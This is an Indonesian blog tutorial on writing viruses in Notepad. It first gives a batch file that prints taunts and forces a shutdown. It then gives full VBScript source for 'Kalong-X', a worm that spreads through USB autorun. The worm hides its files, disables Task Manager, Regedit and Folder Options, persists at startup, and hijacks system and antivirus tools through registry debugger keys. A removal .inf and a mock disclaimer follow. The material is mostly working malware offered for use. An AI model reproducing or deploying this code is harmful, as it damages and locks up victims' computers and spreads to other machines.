STEPS: 1. Open Notepad 2.

Copy this source code below in Notepad: cls :A color 0a cls @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo BERSIAP-SIAP MENGHANCURKAN SYSTEM echo echo: echo: start /w wscript.exe C:\sleep3000.vbs echo NEXT!<brstart /w wscript.exe C:\sleep2000.vbs echo: echo: echo HI, NAMAKU PUTRA echo MAU JADI TEMAN AKU ?? echo: echo: echo LENGKAPNYA ARDIANSYAH PUTRA, NTAR SELANJUTNYA AKU KASIH DATA YG LENGKAP YAA. start /w wscript.exe C:\sleep2000.vbs echo start /w wscript.exe C:\sleep4000.vbs echo echo NTAR.! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo DARI BLOGNYA ARDIANSYAHPUTRA.WORDPRESS.COM cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdirSi_Ganteng_Putra start /w wscript.exe C:\sleep3000.vbs echo: echo:

echo: echo: echo COMING UP NEXT. echo BY ARDIANSYAH PUTRA echo ELECTRICAL ENGINEERING, ANDALAS UNIVERSITY, WEST SUMATERA, INDONESIA echo POETRA_ARDIANSYAH@YAHOO.CO.ID echo CALL ME YACHH +6281363xxxxxx SMS JUG BOLEH LHO echo: echo: echo: echo: echo: echo SABARAN BRO start /w wscript.exe C:\sleep3000.vbs echo .. echozzzzzzz. echo: echo: start /w wscript.exe C:\sleep3000.vbs echo OKE.Virus AKTIF! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo FIREWALL KAMU ANCUR start /w wscript.exe C:\sleep2000.vbs echo SEMUA PROSESS UDAH DIBANTAI start /w wscript.exe C:\sleep2000.vbs echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo VIRUS MASUK PODIUM! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo SALAM DARI SI GANTENG : ARDIANSYAHPUTRA. echo ARDIANSYAHPUTRA.WORDPRESS.COM echo: echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs

pause shutdown -f -s -c BACK TO MASJID, BACK TO ISLAM. 3. save as whatever.bat, ex: putra.bat 4. Activate it by click. 5. A shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes. 6.To Abort virus Click so that your PC is not shutdown: START RUN and type command: shutdown -a before remaining time is over. look at the fig. below

BUAT VIRUS VIA NOTEPAD kitaakanmembuat virus yang lebihhebatlagi. Kalauada yang belumtahu, sayamaumintamaafkarena di artikelsebelumnyaadakesalahan code.Silahkanganti kata rekursif menjadi rekur.Kalauenggak, bisa syntax error nanti Ayo sekarangkitabukasajaNotepadnyadanketikkan code berikut.Jikamalaskantinggak Copy > Paste. Kalong-X Varian dari Kalong.VBS on error resume next Dim kata-kata berikut dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd siapkanisiautorun isi = [autorun] &vbcrlf& shellexecute=wscript.exe k4l0n6ms32.dll.vbs set fs = createobject(Scripting.FileSystemObject) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur&text.readline rekur = rekur&vbcrlf loop do buat file induk Set windowpath = fs.getspecialfolder(0)

set tf = fs.getfile(windowpath& \k4l0n6-x.dll.vbs ) tf.attributes = 32 set tf = fs.createtextfile(windowpath& \k4l0n6-x.dll.vbs,2,true) tf.writerekur tf.close set tf = fs.getfile(windowpath& \k4l0n6-x.dll.vbs) tf.attributes = 39 sebarke removable disc ditambahkandengan Autorun.inf for each desades in fs.drives If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path<> A: then settf=fs.getfile(desades.path&\k4l0n6ms32.dll.vbs) tf.attributes =32 set tf=fs.createtextfile(desades.path&\k4l0n6ms32.dll.vbs,2,true) tf.writerekur tf.close set tf=fs.getfile(desades.path&\k4l0n6ms32.dll.vbs) tf.attributes = 39 settf =fs.getfile(desades.path&\autorun.inf) tf.attributes = 32 set tf=fs.createtextfile(desades.path&\autorun.inf,2,true) tf.writeisi tf.close set tf = fs.getfile(desades.path&\autorun.inf) tf.attributes=39 end if next Manipulasi Registry set kalong = createobject(WScript.Shell) Ubah IE Title kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title,:: ->KALONG-X<- :: File Hidden takterlihat kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Ad vanced\Hidden,2, REG_DWORD Blokir Find, FolderOptions, Run, Regedit, Task Manager, danklikkanan kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No

Find, 1 , REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No FolderOptions, 1 , REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No Run, 1 , REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa bleRegistryTools, 1 , REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa bleTaskMgr, 1 , REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No ViewContextMenu, 1 , REG_DWORD Buatpesansaat Windows Startup kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNo ticeCaption, THE KALONG-X kalong.RegWrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNo ticeText,No reason for Panic Aktifkansaat Windows Startup kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir, windowpath& \batch- k4l0n6.dll.vbs Alihkanaplikasiberikut.Jikadibukamaka program terbukadengan Notepad kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger,notepad.exe kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger,notepad.exe Bonus if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(Wscript.shell) sd.runwindowpath& \explorer.exe /e,/select, &Wscript.ScriptFullname SetelahAndamenempatkankodetersebutklik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalusimpandengannama k4l0n6ms32.dll.vbs. SetelahitucobaAndajalankan.Dan ya, Andatelahmenjalankan KALONG-X.VBS di komputerAnda. JikaAndamembukaaplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAVRTP.exe makaakanterbuka Notepad yang isinyakuranglebihmiripsepertiini : Ingatjadilah orang yang bermanfaatbagi orang lain. Tidakada barangberbahaya disinikarenaAndalah yang membuatnyaberbahaya.SayatidakbertanggungjawabapabilaAndamenyalahgunakankodeini.Iniunt ukilmupengetahuansemata.KalaudisalahgunakansayakutukmukanyamiripTukul (Wahjaditerkenalnanti)jangandeh.PokoknyasegalakenekatanAndaditanggungolehAndasendi ri. Virus inipunyakemampuanAutorunjadikomputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus iniakandiinfeksi pula (jikaAutoruntidak di non-aktifkan) NOTE: Untukmembersihkan Kalong-X caranyamudah. Tinggalhentikan proses yang bernama wscript.exe. Jika di WinNT Andabisamelakukannyalewat Task Manager.Tapikalau Win9X silahkancari tool pengganti Task Manager misalnyaProcexpatauCurrProcess. Soalnyaterkadangkalaulewatperintah Command Prompt gakbisa. SetelahAndamemberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jikatidakadatampilkandulu file hidden dengan Folder Options. Setelahituperbaiki Registry.Untukmempercepatsalinkodeinike Notepad : [Version] Signature=$Chicago$ Provider=Fariskhi [DefaultInstall] AddReg=UnhookRegKey DelReg=del [UnhookRegKey] HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, INTERNET EXPLORER

[del] HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger Setelahitu save dengan FILE TYPE : ALL FILES (*.*) dansimpandengannama : kalongxremoval.inf. Setelahituklikkanan file tersebutdanpilih install. Jadikitabuat Virus danAntidotnyasama-samadengan Notepad.ini adalah tutorial miliktemanakutapitenangaja da kurubahsintakprogramnya di dibagianregisrynyakaliii